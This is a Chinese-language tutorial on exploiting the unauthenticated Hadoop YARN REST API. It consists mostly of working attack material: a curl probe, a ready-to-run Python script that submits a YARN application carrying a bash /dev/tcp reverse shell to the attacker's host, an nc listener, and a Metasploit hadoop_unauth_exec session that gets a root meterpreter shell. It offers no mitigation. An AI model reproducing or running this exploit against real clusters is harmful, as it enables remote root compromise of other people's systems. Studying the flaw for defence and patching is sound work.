Hadoop Yarn REST API未授權漏洞利用
Hadoop是一個由Apache基金會所開發的分布式系統基礎架構,YARN是hadoop系統上的資源統一管理平台,其主要作用是實現集群資源的統一管理和調度,可以把MapReduce計算框架作為一個應用程序運行在YARN系統之上,通過YARN來管理資源。簡單的說,用戶可以向YARN提交特定應用程序進行執行,其中就允許執行相關包含系統命令。
yarn默認開發8088和8089端口。
檢測漏洞存在方式:
curl -X POST 172.16.20.134:8088/ws/v1/cluster/apps/new-application
返回如下請求證明存在
漏洞利用python代碼 :
import requests
target = 'http://172.16.20.134:8088/'
lhost = '172.16.20.108' # put your local host ip here, and listen at port 9999
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
print(resp.text)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
},
},
'application-type': 'YARN',
}
print (data)
requests.post(url, json=data)
本地監聽,返回shell
nc -lvp 9999
msf漏洞模塊
msf5 > use exploit/linux/http/hadoop_unauth_exec msf5 exploit(linux/http/hadoop_unauth_exec) > show options Module options (exploit/linux/http/hadoop_unauth_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 8088 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141 rhost => 192.168.77.141 msf5 exploit(linux/http/hadoop_unauth_exec) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp msf5 exploit(linux/http/hadoop_unauth_exec) > show options Module options (exploit/linux/http/hadoop_unauth_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.77.141 yes The target address RPORT 8088 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (linux/x86/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141 lhost => 192.168.77.141 msf5 exploit(linux/http/hadoop_unauth_exec) > exploit [*] Started reverse TCP handler on 192.168.77.141:4444 [*] Sending Command [*] Command Stager progress - 100.00% done (763/763 bytes) [*] Sending stage (853256 bytes) to 172.20.0.3 [*] Meterpreter session 1 opened (192.168.77.141:4444 -> 172.20.0.3:34138) at 2018-05-15 03:21:17 -0400 meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0